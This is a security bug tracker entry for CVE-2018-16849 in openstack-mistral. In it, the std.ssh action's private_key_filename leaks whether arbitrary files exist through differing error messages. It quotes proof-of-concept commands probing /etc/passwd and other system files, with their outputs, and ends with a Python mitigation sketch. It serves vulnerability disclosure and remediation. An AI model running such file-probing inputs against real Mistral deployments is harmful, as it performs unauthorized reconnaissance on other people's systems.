Bug 1645334 (CVE-2018-16849)

Summary: CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arbitrary files
Product: [Other] Security Response
Reporter: James Hebden <jhebden>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: medium
Priority: medium
Version: unspecified
CC: apevec, chrisw, jjoyce, jschluet, lhh, lpeer, markmc, mburns, rbryant, sclewis, slinaber, tdecacqu, tvignaud
Keywords: Security
Hardware: All
OS: Linux
Fixed In Version: openstack-mistral 7.0.1, openstack-mistral 8.0.0.0b1
Doc Text:
An information-disclosure flaw was discovered in openstack-mistral, where the SSH private key filename of a std.ssh action could be manipulated. The flaw could be exploited to determine the presence of a file path on the host executing the std.ssh action, based on the returned error message.
Last Closed: 2021-10-25 22:21:10 UTC
Bug Depends On: 1645350, 1645351, 1679103    
Bug Blocks: 1623055    

Description James Hebden 2018-11-02 01:12:48 UTC
The std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action.
Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.

Comment 1 James Hebden 2018-11-02 02:59:43 UTC
Upstream bug: https://bugs.launchpad.net/mistral/+bug/1783708

Comment 3 James Hebden 2018-11-02 03:31:36 UTC
Example from the upstream bug:

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/notthere"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/notthere'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: [Errno 2] No such file or directory: u'/notthere'"}

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/passwd"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/passwd'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}


This can help detect the nature of the underlying system:

For example, to test for the presence of a Fedora release file:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/fedora-release"}'
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/fedora-release'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}

Comment 6 Laura Pardo 2019-05-22 15:16:03 UTC
Acknowledgments:

Name: the Mistral project
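
A sketch of two mitigations for the behaviour reported above, as an added example that is not Mistral's code or its upstream fix: confine private_key_filename to a dedicated key directory, and return one error message for every failure so the response no longer distinguishes a missing file from an existing one. The function names, the error text and the PEM-header check are assumptions made for illustration.

```python
import os
import tempfile

GENERIC_ERROR = "private key could not be loaded"  # constructed message


class KeyLoadError(Exception):
    """Single error type returned to the caller for every failure mode."""


def resolve_key_path(key_dir, name):
    """Resolve `name` inside `key_dir`; reject anything that escapes it."""
    base = os.path.realpath(key_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # join() drops `base` for absolute names; realpath() collapses ".." and symlinks.
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        raise KeyLoadError(GENERIC_ERROR)
    return candidate


def load_key(key_dir, name):
    """Return key bytes, or raise KeyLoadError with a uniform message."""
    path = resolve_key_path(key_dir, name)
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        raise KeyLoadError(GENERIC_ERROR) from None
    # Stand-in format check (assumption); a real loader would parse the key.
    if not data.startswith(b"-----BEGIN "):
        raise KeyLoadError(GENERIC_ERROR)
    return data


def probe(key_dir, name):
    """What the API caller sees for a given private_key_filename."""
    try:
        load_key(key_dir, name)
        return "ok"
    except KeyLoadError as exc:
        return str(exc)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:  # constructed sample key dir
        with open(os.path.join(d, "id_rsa"), "wb") as fh:
            fh.write(b"-----BEGIN RSA PRIVATE KEY-----\n(constructed)\n")
        for name in ("id_rsa", "missing", "/notthere", "/etc/passwd"):
            print(name, "->", probe(d, name))
```

The detailed cause (missing file, path outside the key directory, malformed key) can still be written to the executor's own log for operators; only the text returned to the API caller is made uniform.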